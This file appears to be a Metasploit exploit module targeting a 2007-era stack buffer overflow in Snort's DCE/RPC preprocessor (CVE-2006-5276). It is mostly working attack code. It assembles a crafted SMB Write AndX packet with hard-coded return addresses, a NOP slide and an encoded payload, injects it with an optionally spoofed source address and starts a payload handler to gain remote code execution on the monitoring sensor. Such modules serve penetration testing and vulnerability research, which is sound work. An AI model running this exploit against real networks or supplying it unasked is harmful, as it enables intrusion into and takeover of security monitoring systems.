##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
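class MetasploitModule < Msf::Exploit::Remote
  Rank = GoodRanking

  include Msf::Exploit::Capture
  include Msf::Exploit::Remote::Tcp

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Snort 2 DCE/RPC Preprocessor Buffer Overflow',
        'Description' => %q{
          This module allows remote attackers to execute arbitrary code by exploiting the
          Snort service via crafted SMB traffic. The vulnerability is due to a boundary
          error within the DCE/RPC preprocessor when reassembling SMB Write AndX requests,
          which may result a stack-based buffer overflow with a specially crafted packet
          sent on a network that is monitored by Snort.

          Vulnerable versions include Snort 2.6.1, 2.7 Beta 1 and SourceFire IDS 4.1, 4.5 and 4.6.

          Any host on the Snort network may be used as the remote host. The remote host does not
          need to be running the SMB service for the exploit to be successful.
        },
        'Author' => [
          'Neel Mehta', # Original discovery (IBM X-Force)
          'Trirat Puttaraksa', # POC
          'Carsten Maartmann-Moe <carsten[at]carmaa.com>', # Metasploit win
          '0a29406d9794e4f9b30b3c5d6702c708' # Metasploit linux
        ],
        'License' => MSF_LICENSE,
        'References' => [
          [ 'OSVDB', '32094' ],
          [ 'CVE', '2006-5276' ],
          [ 'URL', 'http://web.archive.org/web/20070221235015/http://www.snort.org/docs/advisory-2007-02-19.html'],
          [ 'URL', 'http://sf-freedom.blogspot.com/2007/02/snort-261-dcerpc-preprocessor-remote.html'],
          [ 'URL', 'http://downloads.securityfocus.com/vulnerabilities/exploits/22616-linux.py']
        ],
        'DefaultOptions' => {
          'EXITFUNC' => 'thread',
        },
        'Payload' => {
          # 390 bytes keeps the 16-bit Write AndX length (payload + Offset) well inside the
          # static NetBIOS session length written by buildpacket.
          'Space' => 390,
          'BadChars' => "\x00",
          'DisableNops' => true,
        },
        'Platform' => %w{win linux},
        'Targets' => [
          [
            'Windows Universal',
            {
              'Platform' => 'win',
              'Ret' => 0x00407c01, # JMP ESP snort.exe
              'Offset' => 289, # The number of bytes before overwrite
              'Padding' => 0
            }
          ],
          [
            'Redhat 8',
            {
              'Platform' => 'linux',
              # Fixed stack address rather than a gadget, so this target presumably needs a
              # non-randomised stack; a wrong guess will most likely just crash the sensor.
              'Ret' => 0xbffff110,
              'Offset' => 317,
              'Padding' => 28
            }
          ]
        ],
        'Privileged' => true,
        'DisclosureDate' => '2007-02-19',
        'DefaultTarget' => 0,
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )

    register_options(
      [
        Opt::RPORT(139),
        # RHOST is only a destination for the injected segment; it is the sensor watching the
        # path to RHOST that gets exploited, so no service needs to listen there.
        OptAddress.new('RHOST', [ true, 'A host on the Snort-monitored network' ]),
        # The segment is injected raw, so the source address is free to be spoofed.
        OptAddress.new('SHOST', [ false, 'The (potentially spoofed) source address'])
      ]
    )

    # The capture mixin's sniffing options are irrelevant: the pcap handle is used for injection only.
    deregister_options('FILTER', 'PCAPFILE', 'SNAPLEN', 'TIMEOUT')
  end

  # Injects one crafted SMB segment towards RHOST and then starts the payload handler.
  #
  # No TCP session with RHOST is set up; the single PSH/ACK segment only has to cross a
  # link the sensor monitors. The pcap handle opened for injection is always released,
  # whether or not the injection succeeds.
  def exploit
    open_pcap

    # SHOST is optional; fall back to the address the local host would use to reach RHOST.
    shost = datastore['SHOST'] || Rex::Socket.source_address(rhost)
    pkt = buildpacket(shost, rhost, rport.to_i)

    print_status("#{rhost}:#{rport} Sending crafted SMB packet from #{shost}...")

    begin
      sent = capture_sendto(pkt, rhost)
    ensure
      # Release the pcap handle even when injection fails or raises.
      close_pcap
    end
    return unless sent

    handler
  end

  # Builds the raw TCP segment carrying the malformed SMB Write AndX sequence.
  #
  # @param shost [String] source IP address (may be spoofed)
  # @param rhost [String] destination IP address on the monitored network
  # @param rport [Integer] destination TCP port
  # @return [PacketFu::TCPPacket] segment with lengths and checksums recalculated
  def buildpacket(shost, rhost, rport)
    pkt = PacketFu::TCPPacket.new
    pkt.ip_saddr = shost
    pkt.ip_daddr = rhost
    pkt.tcp_dport = rport
    pkt.tcp_flags.psh = 1
    pkt.tcp_flags.ack = 1

    # Everything up to the data-length field of the second Write AndX request.
    header = smb_prelude

    # Remainder of the second Write AndX header that follows the data-length field.
    tail = "\x00\x00\x00\x00\x49\x00\xee"

    # Return address, little-endian, overwriting the saved return pointer.
    eip = [target['Ret']].pack('V')

    # Sploit: short NOP slide, the encoded payload, then one extra NOP so the
    # preprocessor's size check is passed.
    sploit = make_nops(10)
    sploit << payload.encoded
    sploit << make_nops(1)

    # Data length advertised in Write AndX Request #2, covering the sploit plus the
    # target-specific distance to the overwrite. bytesize is used because this is a
    # byte count, independent of how the strings happen to be encoding-tagged.
    requestsize = [sploit.bytesize + target['Offset']].pack('v')

    pkt.payload = header << requestsize << tail << make_nops(target['Padding']) << eip << sploit

    # Fix up IP/TCP lengths and checksums after the payload is attached.
    pkt.recalc

    pkt
  end

  private

  # Static SMB prelude borrowed from https://www.exploit-db.com/exploits/3362: NetBIOS
  # session header, SMB header, Tree Connect AndX, NT Create AndX, a complete Write AndX
  # Request #1 and the first part of Write AndX Request #2 (up to its data-length field).
  #
  # @return [String] a fresh, mutable byte string
  def smb_prelude
    parts = []

    # NetBIOS Session Service length. Statically set; only has to exceed the total size
    # of the data that follows.
    parts << "\x00\x00\xde\xad"

    # SMB Header
    parts << "\xff\x53\x4d\x42\x75\x00\x00\x00\x00\x18\x07\xc8\x00\x00"
    parts << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xfe"
    parts << "\x00\x08\x30\x00"

    # Tree Connect AndX Request
    parts << "\x04\xa2\x00\x52\x00\x08\x00\x01\x00\x27\x00\x00"
    parts << "\x5c\x00\x5c\x00\x49\x00\x4e\x00\x53\x00\x2d\x00\x4b\x00\x49\x00"
    parts << "\x52\x00\x41\x00\x5c\x00\x49\x00\x50\x00\x43\x00\x24\x00\x00\x00"
    parts << "\x3f\x3f\x3f\x3f\x3f\x00"

    # NT Create AndX Request
    parts << "\x18\x2f\x00\x96\x00\x00\x0e\x00\x16\x00\x00\x00\x00\x00\x00\x00"
    parts << "\x9f\x01\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
    parts << "\x03\x00\x00\x00\x01\x00\x00\x00\x40\x00\x40\x00\x02\x00\x00\x00"
    parts << "\x01\x11\x00\x00\x5c\x00\x73\x00\x72\x00\x76\x00\x73\x00\x76\x00"
    parts << "\x63\x00\x00\x00"

    # Write AndX Request #1
    parts << "\x0e\x2f\x00\xfe\x00\x00\x40\x00\x00\x00\x00\xff\xff\xff\xff\x80"
    parts << "\x00\x48\x00\x00\x00\x48\x00\xb6\x00\x00\x00\x00\x00\x49\x00\xee"
    parts << "\x05\x00\x0b\x03\x10\x00\x00\x00\xff\x01\x00\x00\x01\x00\x00\x00"
    parts << "\xb8\x10\xb8\x10\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x01\x00"
    parts << "\xc8\x4f\x32\x4b\x70\x16\xd3\x01\x12\x78\x5a\x47\xbf\x6e\xe1\x88"
    parts << "\x03\x00\x00\x00\x04\x5d\x88\x8a\xeb\x1c\xc9\x11\x9f\xe8\x08\x00"
    parts << "\x2b\x10\x48\x60\x02\x00\x00\x00"

    # Write AndX Request #2 (truncated before the data-length field)
    parts << "\x0e\xff\x00\xde\xde\x00\x40\x00\x00\x00\x00\xff\xff\xff\xff\x80"
    parts << "\x00\x48\x00\x00\x00\xff\x01"

    parts.join
  end
end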